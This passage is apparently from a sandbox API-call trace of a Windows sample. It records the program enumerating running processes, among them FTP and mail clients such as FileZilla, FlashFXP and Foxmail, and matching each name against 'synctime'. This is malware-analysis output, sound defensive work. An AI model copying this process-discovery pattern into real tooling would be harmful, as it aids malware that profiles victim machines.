(uFlags=0x40, uBytes=0x15) returned 0x3567190 [0093.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x3567190, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0093.150] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0093.150] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="synctime") returned 0x0 [0093.150] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0093.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0093.151] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35671d0 [0093.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x35671d0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0093.151] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0093.151] StrStrIA (lpFirst="registered try.exe", lpSrch="synctime") returned 0x0 [0093.151] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0093.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0093.153] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x35668b8 [0093.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x35668b8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0093.153] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0093.153] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="synctime") returned 0x0 [0093.153] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0093.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.154] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3567d28 [0093.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x3567d28, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0093.154] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0093.154] StrStrIA (lpFirst="invite.exe", lpSrch="synctime") returned 0x0 [0093.154] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0093.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0093.155] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3567fe0 [0093.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x3567fe0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0093.156] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0093.156] StrStrIA (lpFirst="idol.exe", lpSrch="synctime") returned 0x0 [0093.156] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0093.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0093.157] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3566520 [0093.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x3566520, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0093.157] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0093.157] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="synctime") returned 0x0 [0093.157] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0093.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0093.158] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x3566458 [0093.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x3566458, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0093.158] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0093.174] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="synctime") returned 0x0 [0093.174] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0093.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0093.176] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3567dd0 [0093.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x3567dd0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0093.176] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0093.176] StrStrIA (lpFirst="powell_jane.exe", lpSrch="synctime") returned 0x0 [0093.176] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0093.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.177] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3567290 [0093.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x3567290, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0093.177] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0093.177] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="synctime") returned 0x0 [0093.177] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0093.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0093.179] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3567d40 [0093.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3567d40, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0093.179] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0093.179] StrStrIA (lpFirst="gainedshape.exe", lpSrch="synctime") returned 0x0 [0093.179] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0093.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0093.180] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35670f0 [0093.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x35670f0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0093.180] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0093.180] StrStrIA (lpFirst="opens-versions.exe", lpSrch="synctime") returned 0x0 [0093.180] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0093.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0093.181] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x35664a8 [0093.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x35664a8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0093.181] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0093.181] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="synctime") returned 0x0 [0093.182] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0093.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.183] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3567ef0 [0093.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x3567ef0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0093.183] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0093.183] StrStrIA (lpFirst="3dftp.exe", lpSrch="synctime") returned 0x0 [0093.183] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0093.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0093.184] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3567090 [0093.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x3567090, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0093.184] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0093.184] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="synctime") returned 0x0 [0093.184] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0093.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.186] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3567d70 [0093.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x3567d70, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0093.186] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0093.186] StrStrIA (lpFirst="alftp.exe", lpSrch="synctime") returned 0x0 [0093.186] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0093.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.187] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3567de8 [0093.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x3567de8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0093.187] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0093.187] StrStrIA (lpFirst="barca.exe", lpSrch="synctime") returned 0x0 [0093.187] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0093.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.188] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3567f38 [0093.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x3567f38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0093.188] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0093.188] StrStrIA (lpFirst="bitkinex.exe", lpSrch="synctime") returned 0x0 [0093.188] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0093.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.190] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567f68 [0093.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x3567f68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0093.190] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0093.190] StrStrIA (lpFirst="coreftp.exe", lpSrch="synctime") returned 0x0 [0093.190] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0093.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0093.193] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3547848 [0093.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x3547848, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0093.193] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0093.193] StrStrIA (lpFirst="far.exe", lpSrch="synctime") returned 0x0 [0093.193] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0093.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.194] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3567f80 [0093.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x3567f80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0093.194] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0093.194] StrStrIA (lpFirst="filezilla.exe", lpSrch="synctime") returned 0x0 [0093.194] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0093.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.195] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3567f50 [0093.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x3567f50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0093.196] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0093.196] StrStrIA (lpFirst="flashfxp.exe", lpSrch="synctime") returned 0x0 [0093.196] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0093.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.197] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3567d88 [0093.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x3567d88, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0093.197] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0093.197] StrStrIA (lpFirst="fling.exe", lpSrch="synctime") returned 0x0 [0093.197] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0093.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0093.198] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35670b0 [0093.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x35670b0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0093.198] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0093.198] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="synctime") returned 0x0 [0093.198] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0093.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, 